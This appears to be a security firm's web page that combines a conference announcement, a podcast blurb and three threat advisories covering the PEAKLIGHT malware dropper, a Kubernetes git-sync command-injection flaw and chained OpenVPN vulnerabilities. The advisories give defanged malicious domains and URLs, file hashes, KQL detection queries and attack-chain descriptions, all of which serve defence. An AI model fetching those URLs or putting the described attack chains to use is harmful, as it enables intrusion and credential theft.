Blackswan CEO, Dr. Mike Saylor, Selected to Present at MSSP Alert Live 2024

Blackswan CEO, Dr. Mike Saylor, Selected to Present at MSSP Alert Live 2024

MSSP-ALERT-LIVE-DR-MIKE-SAYLOR

REGISTER

Blackswan Cybersecurity is proud to announce that our CEO, Dr. Mike Saylor, was selected to present at MSSP Alert Live 2024 — October 14-16 in Austin, TX.

This year’s event will provide you with insights and information you can use about the most recent cybersecurity strategies, technologies and business opportunities. Plus, you’ll gain new perspectives about the following market-moving trends to help you with your business:

  • Artificial intelligence (AI), including how it has been and can be used for incident response and crisis communications.
  • Tackling the shortage of cybersecurity talent and professionals, and how to get the most out of your existing workforce.
  • Cybersecurity liability – how to protect your business if a breached customer sues.
  • Cybersecurity insurance – how the cyber insurance market is changing and what you need to know as you head into 2025.

Whether you are just getting started offering managed security services, or an established MSSP, MSSP Alert Live will deliver everything you need for your managed security services roadmap for 2025 and beyond.

PEAKLIGHT Dropper Exploits Windows Systems via Pirated Movie Downloads to Deliver Malware

PEAKLIGHT Dropper Exploits Windows Systems via Pirated Movie Downloads to Deliver Malware

DOWNLOAD PDF

SUMMARY

A novel dropper that launches PowerShell-based malware to infect Windows systems has been identified, which is distributed through pirated movie downloads. The dropper delivers various malware strains, including Lumma Stealer and CryptBot, via a multi-stage attack chain.

 

TECHNICAL DETAILS

Mandiant identified the dropper that delivers various malware strains, including Lumma Stealer, Hijack Loader, and CryptBot, by leveraging a memory-only PowerShell-based downloader known as PEAKLIGHT. The attack starts when users download a Windows shortcut (LNK) file disguised as a pirated movie via drive-by downloads.

 

The LNK file, hidden within a ZIP archive, connects to a content delivery network (CDN) hosting an obfuscated JavaScript dropper. This dropper then runs the PEAKLIGHT PowerShell script, which contacts a command-and-control (C2) server to retrieve and execute additional malware payloads. The dropper is also capable of embedding hex-encoded and Base64-encoded PowerShell payloads, which are unpacked to deploy the malware.

 

Mandiant noted that this method has been used in various attack chains, with LNK files using wildcards to trigger the execution of the mshta.exe binary, discreetly running the malicious code.

INFECTION CHAIN
(Source: Mandiant)

 

INDICATORS OF COMPROMISE (IOCs)

Domains:

  • relaxtionflouwerwi[.]shop
  • deprivedrinkyfaiir[.]shop
  • detailbaconroollyws[.]shop
  • messtimetabledkolvk[.]shop
  • considerrycurrentyws[.]shop
  • understanndtytonyguw[.]shop
  • patternapplauderw[.]shop
  • horsedwollfedrwos[.]shop
  • tropicalironexpressiw[.]shop

 

URLs:

  • hxxp://gceight8vt[.]top/upload.php
  • hxxps://brewdogebar[.]com/code.vue
  • hxxp://62.133.61[.]56/Downloads/Full%20Video%20HD%20(1080p).lnk
  • hxxps://fatodex.b-cdn[.]net/K1.zip
  • hxxps://fatodex.b-cdn[.]net/K2.zip
  • hxxps://forikabrof[.]click/flkhfaiouwrqkhfasdrhfsa.png
  • hxxps://matodown.b-cdn[.]net/K1.zip
  • hxxps://matodown.b-cdn[.]net/K2.zip
  • hxxps://nextomax.b-cdn[.]net/L1.zip
  • hxxps://nextomax.b-cdn[.]net/L2.zip
  • hxxps://potexo.b-cdn[.]net/K1.zip
  • hxxps://potexo.b-cdn[.]net/K2.zip
  • hxxps://fatodex.b-cdn[.]net/fatodex
  • hxxps://matodown.b-cdn[.]net/matodown
  • hxxps://potexo.b-cdn[.]net/potexo

 

MD5:

CRYPTBOT:

  • erefgojgbu (MD5: d6ea5dcdb2f88a65399f87809f43f83c)
  • zip (MD5: 307f40ebc6d8a207455c96d34759f1f3)
  • Sеexe (MD5: d8e21ac76b228ec144217d1e85df2693)

 

LUMMAC.V2:

  • oqnhustu (MD5: 43939986a671821203bf9b6ba52a51b4)
  • dll (MD5: 58c4ba9385139785e9700898cb097538)

 

PEAKLIGHT:

  • Downloader (MD5: 95361f5f264e58d6ca4538e7b436ab67)
  • Downloader (MD5: b716a1d24c05c6adee11ca7388b728d3)

 

SHADOWLADDER:

  • exe (MD5: b15bac961f62448c872e1dc6d3931016)
  • cfg (MD5: e7c43dc3ec4360374043b872f934ec9e)
  • doc (MD5: f98e0d9599d40ed032ff16de242987ca)
  • zip (MD5: b6b8164feca728db02e6b636162a2960)
  • zip (MD5: bb9641e3035ae8c0ab6117ecc82b65a1)
  • zip (MD5: 236c709bbcb92aa30b7e67705ef7f55a)
  • zip (MD5: d7aff07e7cd20a5419f2411f6330f530)
  • zip (MD5: a6c4d2072961e9a8c98712c46be588f8)
  • dll (MD5: 059d94e8944eca4056e92d60f7044f14)
  • txt (MD5: dfdc331e575dae6660d6ed3c03d214bd)
  • dll (MD5: 47eee41b822d953c47434377006e01fe)

 

RECOMMENDATIONS

  • Do not download pirated content or software from untrusted sources.
  • Ensure that antivirus and anti-malware solutions are current and capable of detecting PowerShell-based threats.
  • Monitor for unusual activities such as the execution of mshta.exe or unexpected network connections to CDN sites.
  • Implement security measures that can detect and block obfuscated scripts and LNK file-based attacks.
  • Educate users about the risks associated with downloading files from unreliable websites, especially those offering pirated content.

 

REFERENCES

 

 

PEAKLIGHT Dropper Exploits Windows Systems via Pirated Movie Downloads to Deliver Malware

Critical Kubernetes Flaw Exposes Clusters to Command Injection Attacks

DOWNLOAD PDF

SUMMARY

A critical Kubernetes vulnerability allows attackers to execute command injection attacks, affecting default installations across major platforms like Amazon EKS, Azure AKS, and Google GKE. The vulnerability enables malicious command execution and data exfiltration. Despite the severity, no CVE has been assigned, and an official patch is yet to be released.

THREAT ADVISORY

VULNERABILITY DETAILS

Akamai identified the flaw, found in the git-sync project, a sidecar container within Kubernetes used to synchronize a pod with a Git repository. The issue stems from inadequate input sanitization during the synchronization process, inadvertently creating a large attack surface.

Attackers can exploit this flaw by deploying a malicious YAML file to the Kubernetes cluster, a low-privilege operation that can lead to command injection. Two parameters, GITSYNC_GIT and GITSYNC_PASSWORD_FILE, are particularly vulnerable. GITSYNC_GIT can be manipulated to replace legitimate commands with a malicious binary, allowing arbitrary code execution. Similarly, GITSYNC_PASSWORD_FILE can be used to exfiltrate sensitive information, such as access tokens, from the pod.

The consequences of this vulnerability are severe, including unauthorized command execution, data theft, and potential compromise of the entire Kubernetes cluster. Attackers could also deploy cryptominers or other malicious binaries under the guise of legitimate operations, bypassing security measures and facilitating stealthy attacks. The flaw is especially concerning for organizations with pre-authorized git-sync communication within their clusters, as attackers with minimal privileges could exploit it to gain significant control.

 

RECOMMENDATIONS

  • Enhance monitoring of outgoing communications from Kubernetes pods, particularly those using git-sync.
  • Regular audits of git-sync pods should be conducted to ensure they execute only expected commands.
  • Implement Open Policy Agent (OPA) rules to detect and block potential attack vectors by identifying unauthorized changes to git-sync configurations.
  • Restrict editing privileges to minimize the attack surface.

 

REFERENCES

 

PEAKLIGHT Dropper Exploits Windows Systems via Pirated Movie Downloads to Deliver Malware

OpenVPN Vulnerabilities Lead to RCE and LPE

DOWNLOAD PDF OF THREAT REPORT

SUMMARY

Microsoft reported four medium-severity vulnerabilities in OpenVPN that could be combined to enable remote code execution (RCE) and local privilege escalation (LPE). “Exploiting this attack chain could allow attackers to take full control of targeted endpoints, potentially leading to data breaches, system compromises, and unauthorized access to sensitive information,” stated Vladimir Tokarev from the Microsoft Threat Intelligence Community.

THREAT ADVISORY

THREAT ADVISORY

TECHNICAL DETAILS

Researchers discovered vulnerabilities while analyzing the OpenVPN open-source project to improve enterprise security standards. During this examination, they also reviewed two other popular VPN solutions and identified that they were vulnerable to a specific flaw (CVE-2024-1305), which led them to further investigate open-source VPN projects. Upon confirming that the same vulnerability existed in the OpenVPN repository, the research focused on evaluating the architecture and security model of OpenVPN, particularly for Windows systems.

 

List of Vulnerabilities:

  • CVE-2024-27459: A stack overflow vulnerability in Windows leading to a Denial-of-Service (DoS) and Local Privilege Escalation (LPE).
  • CVE-2024-24974: Unauthorized access to the “openvpnservice” named pipe in Windows, allowing remote attackers to interact with it and perform operations.
  • CVE-2024-27903: A flaw in the plugin mechanism causing Remote Code Execution (RCE) in Windows, and LPE and data manipulation in Android, iOS, macOS, and BSD.
  • CVE-2024-1305: A memory overflow vulnerability in the Windows Terminal Access Point (TAP) driver, leading to DoS.

 

The first three vulnerabilities are linked to a component named openvpnserv, while the fourth is related to the Windows TAP driver. These vulnerabilities can be exploited if an attacker gains access to a user’s OpenVPN credentials. Such credentials can be acquired through methods like purchasing stolen data on the dark web, deploying stealer malware, or capturing network traffic to obtain NTLMv2 hashes and cracking them using tools like HashCat or John the Ripper.

 

Attackers can chain these vulnerabilities by combining, for example, CVE-2024-24974 with CVE-2024-27903 or CVE-2024-27459 with CVE-2024-27903—to achieve RCE and LPE. Vladimir Tokarev noted that at least three of the four discovered flaws could be leveraged to construct a potent attack chain, including techniques like Bring Your Own Vulnerable Driver (BYOVD). This could allow attackers to disable critical security processes, such as Microsoft Defender’s Protect Process Light (PPL), bypass security products, and manipulate core system functions, making detection and mitigation more challenging.

 

Hunting Queries:

Detecting Remote Connections to OpenVPN’s Named Pipe:

DeviceEvents

| where ActionType == “NamedPipeEvent”

| extend JsonAdditionalFields=”parse_json(AdditionalFields)”

| extend PipeName=”JsonAdditionalFields[“PipeName”]”

| where PipeName == “\Device\NamedPipe\openvpn\service” and isnotempty(RemoteIP)

 

Identifying Image Load from Shared Folder into OpenVPN’s Process:

DeviceImageLoadEvents

| where InitiatingProcessFileName == “openvpn.exe” and FolderPath startswith “\\”

 

Detecting Unauthorized Process Connection to OpenVPN’s Named Pipe:

DeviceEvents

| where ActionType == “NamedPipeEvent”

| extend JsonAdditionalFields=”parse_json(AdditionalFields)”

| extend PipeName=”JsonAdditionalFields[“PipeName”],” NamedPipeEnd=”JsonAdditionalFields[“NamedPipeEnd”]”

| where PipeName == “\Device\NamedPipe\openvpn\service” and NamedPipeEnd == “Server” and InitiatingProcessFileName != “openvpnserv.exe”

 

RECOMMENDATIONS

Patch Vulnerable Versions:

  • Ensure that OpenVPN versions prior to 2.5.10 and 2.6.10 are updated. Apply the necessary patches from the OpenVPN website.
  • Security Best Practices:
  • Disconnect OpenVPN clients from the internet and segment them within the network.
  • Restrict access to OpenVPN clients to authorized users only.
  • Prioritize patching while ensuring proper network segmentation, enforcing strong passwords, and minimizing the number of users with write authentication.

 

REFERENCES

 

The Backup Wrap-up Podcast — Ransomware Forensics

The Backup Wrap-up Podcast — Ransomware Forensics

AUDIO ONLY

This episode of The Backup Wrap-Up dives into the critical realm of ransomware forensics with cybersecurity expert and Blackswan CEO, Dr. Mike Saylor. They examine the key procedures and tools involved in forensic analysis during a cyber attack, emphasizing the need to preserve evidence and manage the intricacies of both traditional and mobile device forensics.

Covering topics from log preservation to forensic imaging, they discuss strategies for organizations to better prepare for and respond to ransomware incidents. Dr. Saylor provides insights into the various forensic tools available, their uses, and the challenges that arise in contemporary cybersecurity investigations. Additionally, they emphasize the importance of having a forensic response plan in-place before an attack occurs.

Whether you’re an IT professional or have an interest in cybersecurity, this episode offers essential insights into the forensic processes that help decode cyber attacks and safeguard critical data. Tune in to now broaden your knowledge of ransomware forensics and bolster your organization’s cyber defense strategies.